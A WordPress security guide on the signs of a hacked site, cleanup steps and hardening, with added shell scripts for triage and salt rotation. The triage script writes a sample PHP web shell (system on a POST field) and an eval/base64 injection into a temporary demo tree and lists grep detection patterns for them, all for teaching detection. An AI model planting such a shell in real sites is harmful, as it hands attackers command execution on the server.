Without proper security measures, you may find yourself with a hacked WordPress site. Because WordPress’ source code is readily available and almost 25% of all sites run WordPress, WordPress sites make an easy and attractive target: one flaw can be exploited across many sites with the same automated tooling.
The WordPress core development team works to find and fix security vulnerabilities in core quickly, but what about the huge number of plugins out there with security flaws? Poorly coded themes? The possible security issues on the server (hosting) side?
Before we look into how we can prevent being hacked, here’s an overview of the signs of WordPress hacks, as well as some of the steps required to clean up a hacked WordPress site. (Note that this is not a definitive guide to clean up a hacked site. It’s just an indication of the implications of having been hacked.)
Signs of a Hacked WordPress Site
Here are a few things to look for if you suspect your WordPress site has been hacked:
- Files on your server or in your WordPress installation that should not exist (telling these apart from legitimate files takes a fair amount of knowledge; the reliable way is to compare your tree against a fresh copy of the same WordPress version and look at anything extra).
- Files that have recent modification dates. If all of the files in your wp-includes directory have a modification date of 2016-06-12 and one of them has a modification date of 2016-11-02, you should be highly suspicious of that recently modified file. Note the limitation: an attacker with file access can reset timestamps, so an old modification date is not proof that a file is clean.
- Strange requests in your access logs, for example POST requests to PHP files under wp-content/uploads or to a file name that is not part of WordPress, or requests carrying long base64-looking parameters. These can point you to the file the attacker is using to modify your site’s files.
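As an added example (not code from the original post), the following shell script turns the three signs above into checks you can run from a shell on the server. It builds a small constructed WordPress-like tree in a temporary directory, backdates the legitimate files, and then lists files modified after a known-good baseline file, PHP files containing typical injection patterns, and PHP files under wp-content/uploads. The theme name, file names and the injected payload are all made up for the demo; the pattern list is an assumption of what is worth flagging and will produce false positives on some legitimate code.

```shell
#!/bin/sh
# Added example: triage checks for a hacked WordPress tree (not from the
# original post). The sample site it builds is constructed for the demo.
set -eu

# Patterns that rarely appear in legitimate theme/plugin code but are typical
# of injected PHP. A hit is a file to read, not proof of compromise.
SUSPICIOUS='eval\((base64_decode|gzinflate|str_rot13)\(|(system|shell_exec|passthru|exec)\(\$_(POST|GET|REQUEST|COOKIE)\[|create_function\('

# recent_mods <site_root> <baseline_file>: files modified after a known-good
# file (e.g. wp-includes/functions.php from the last legitimate update).
# Caveat: an attacker can reset timestamps, so an old mtime proves nothing.
recent_mods() {
    ( cd "$1" && find . -type f -newer "$2" | sort )
}

# scan_injected <site_root>: PHP files matching the suspicious patterns.
scan_injected() {
    ( cd "$1" && find . -type f -name '*.php' -exec grep -lE "$SUSPICIOUS" {} + | sort )
}

# php_in_uploads <site_root>: wp-content/uploads should only hold media;
# any PHP file there is a file that should not exist.
php_in_uploads() {
    ( cd "$1" && find ./wp-content/uploads -type f -name '*.php' | sort )
}

# make_sample_site <dir>: constructed tree with one injected theme file and
# one dropped web shell, backdated to mimic the timeline described above.
make_sample_site() {
    mkdir -p "$1/wp-includes" "$1/wp-content/uploads/2016/06" "$1/wp-content/themes/demo"
    printf '<?php // legitimate core file\n' > "$1/wp-includes/functions.php"
    printf '<?php // legitimate core file\n' > "$1/wp-includes/pluggable.php"
    printf '<?php get_header(); ?>\n' > "$1/wp-content/themes/demo/header.php"
    # injected theme file: obfuscated payload wrapped in eval()
    printf '<?php eval(base64_decode("ZWNobyAib3duZWQiOw==")); get_footer(); ?>\n' \
        > "$1/wp-content/themes/demo/footer.php"
    # dropped web shell disguised as an upload
    printf '<?php if (isset($_POST["c"])) { system($_POST["c"]); } ?>\n' \
        > "$1/wp-content/uploads/2016/06/image.php"
    ( cd "$1" && find . -type f -exec touch -t 201606120000 {} + )   # last legit update
    touch -t 201611020000 "$1/wp-content/themes/demo/footer.php" \
                          "$1/wp-content/uploads/2016/06/image.php"  # the hack
}

# Stand-alone demo on the constructed site.
site=$(mktemp -d)
make_sample_site "$site"
echo "== modified after wp-includes/functions.php"; recent_mods "$site" wp-includes/functions.php
echo "== PHP matching injection patterns";          scan_injected "$site"
echo "== PHP under wp-content/uploads";             php_in_uploads "$site"
rm -rf "$site"
```

On a real site, point recent_mods at a core file you know was last written by a legitimate update, and treat the three lists together: a file that is both recently modified and matches a pattern is where to start reading.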
First Steps for Cleaning Up a Hacked WordPress Site
The scenario we’re looking at is when one (or more) of a theme’s template files have been injected with malicious code. Such code can then affect (and infect) other theme files, or in fact, any other file the web server user can write to. On a shared hosting account where customer accounts are not properly isolated from each other, this could mean that your site is infected through another site hosted on the same server. Now that’s a scary thought.
- Go through all the files in your WordPress installation to make sure that there is no script still remaining on the site that continues to inject malicious code at different intervals.
- Change all FTP, cPanel, database and WordPress passwords, and your WordPress salts and keys. Changing the keys and salts invalidates every existing login cookie, so any session the attacker is still holding is logged out. If the attack happened because the attacker got ahold of any of your admin login credentials and you do not change them, there is nothing to prevent them from automatically modifying files again at a later date.
- Do a comprehensive malware scan of every computer that connects to your server (via FTP or other methods). There is malware that steals saved FTP credentials and logs keystrokes, so even if you change all your passwords, if just one computer is infected, every server and site it connects to will continue to get attacked. Plain FTP also sends credentials in cleartext; use SFTP or FTPS where your host supports it.
- If you have a WordPress backup that you made before the hack, you might try restoring from that backup, checking the files to see if the hack is in place, and go from there.
- Thoroughly clean every one of your sites. Don’t just remove one infected file or run a scanner plugin. Go through every directory on your site and look for suspicious files. You may want to talk to your hosting company and/or hire a consultant such as Sucuri to help with this process. If even one compromised file or covertly placed script remains on the site, the attacker can use it to automatically compromise your site all over again.
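Rotating the keys and salts from the step above is easy to script. The following is an added example, not code from the original post: it rewrites the eight define() lines in wp-config.php with fresh 256-bit random values read from /dev/urandom and writes the file back atomically. The sample wp-config.php it creates is constructed for the demo and uses the stock placeholder text from wp-config-sample.php; on a real site point rotate_salts at your actual wp-config.php (after backing it up).

```shell
#!/bin/sh
# Added example: rotate WordPress keys and salts in wp-config.php
# (not code from the original post).
set -eu

WP_KEYS="AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT"

# new_salt: 64 hex characters = 256 bits from the kernel CSPRNG.
new_salt() {
    od -An -tx1 -N32 /dev/urandom | tr -d ' \n'
}

# rotate_salts <wp-config.php>: replace the value of each define('KEY', '...')
# line, then swap the rewritten copy into place so the file is never half-written.
rotate_salts() {
    cfg="$1"
    tmp="$cfg.tmp.$$"
    cp "$cfg" "$tmp"
    for key in $WP_KEYS; do
        val=$(new_salt)
        sed "s/define( *'$key', *'[^']*' *);/define('$key', '$val');/" "$tmp" > "$tmp.2"
        mv "$tmp.2" "$tmp"
    done
    mv "$tmp" "$cfg"
}

# count_default_salts <wp-config.php>: how many keys still hold the placeholder
# that ships in wp-config-sample.php (a common sign the salts were never set).
count_default_salts() {
    grep -c "put your unique phrase here" "$1" || true
}

# make_sample_config <path>: constructed stand-in for a real wp-config.php.
make_sample_config() {
    {
        echo "<?php"
        for key in $WP_KEYS; do
            echo "define('$key', 'put your unique phrase here');"
        done
        echo "\$table_prefix = 'wp_';"
    } > "$1"
}

# Stand-alone demo on the constructed config.
demo=$(mktemp -d)
make_sample_config "$demo/wp-config.php"
echo "placeholder salts before: $(count_default_salts "$demo/wp-config.php")"
rotate_salts "$demo/wp-config.php"
echo "placeholder salts after:  $(count_default_salts "$demo/wp-config.php")"
grep "^define" "$demo/wp-config.php"
rm -rf "$demo"
```

Every user, including the attacker, is logged out the moment the new file is in place, so do this after you have changed the passwords and are ready to log back in yourself.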
Tip: You can quickly rule out files in the wp-admin and wp-includes directories by downloading a fresh WordPress zip of the same version from wordpress.org, deleting those directories from your site, and uploading the contents of the zip to your site while telling your FTP client to overwrite any existing files. Deleting first matters: overwriting alone leaves behind any extra files the attacker added.
At this point, I would focus on your root directory (wp-config.php, .htaccess and index.php in particular), any non-WordPress directories in the root of your site, and the wp-content directory; wp-content/uploads should contain no PHP files at all. You can also delete and reinstall all plugins and themes, downloaded again from wordpress.org or the vendor rather than copied from the infected site, to ensure that they are clean.
How to Prevent Your WordPress Site From Being Hacked
While there is no such thing as a 100% guaranteed secure site, there are however a lot of measures you can take to harden a site as much as possible.
I’ve seen plugins and themes from shady sites that had code in them that started the ball rolling on hacks. I’ve even seen plugin and theme viruses that would automatically infect every other plugin and theme on the site, so even if you cleaned one of them, it would automatically be reinfected.
Make sure that WordPress and all themes and plugins on your site are up to date. Delete deactivated plugins; don’t leave them in the wp-content/plugins folder. They are a potential security risk, as you probably don’t care too much about updating them, and a vulnerable file in an inactive plugin can still be requested directly over the web. iThemes Sync is a tool that allows you to manage multiple WordPress sites and update WordPress, themes and plugins on all of them with one click.
Back up your WordPress site early, and back up often. Having a healthy full backup of your site is key. Keep an archive of several backup files. If disaster strikes, you will need a backup to restore your site (after the server is cleaned). Quick tip on backup files: run some test restores of your backup files every now and then. Having a backup that you can’t restore is probably the worst thing that can happen (after being hacked). BackupBuddy is a WordPress backup plugin that enables you to set scheduled backups that will run unattended, with backup files saved to a remote location, so that an attacker with access to the server cannot tamper with them. This should offer you peace of mind that you will always have a healthy backup file.
You can take action to make your WordPress site more secure. iThemes Security, a WordPress security plugin, offers several ways to lock a site down: restricting access to the WordPress dashboard, monitoring for file changes, scanning for malware, and so on.
Make sure you’re practicing WordPress password security by using long, complicated passwords that are unique to each account. Activate WordPress two-factor authentication for an added layer of security, so a stolen password alone is not enough to log in.
Make it a habit to regularly evaluate your site’s security, just as you check your vehicle’s oil level periodically. The iThemes Security plugin allows you to run a WordPress security check to make sure you’re running recommended security settings. Make sure to harden WordPress with these 10 WordPress security tips.
Finally, make sure you are hosting your site with a provider that understands the issues and risks of hosting WordPress sites, one that will do its best, from the server side, to provide a safe and well-secured hosting environment.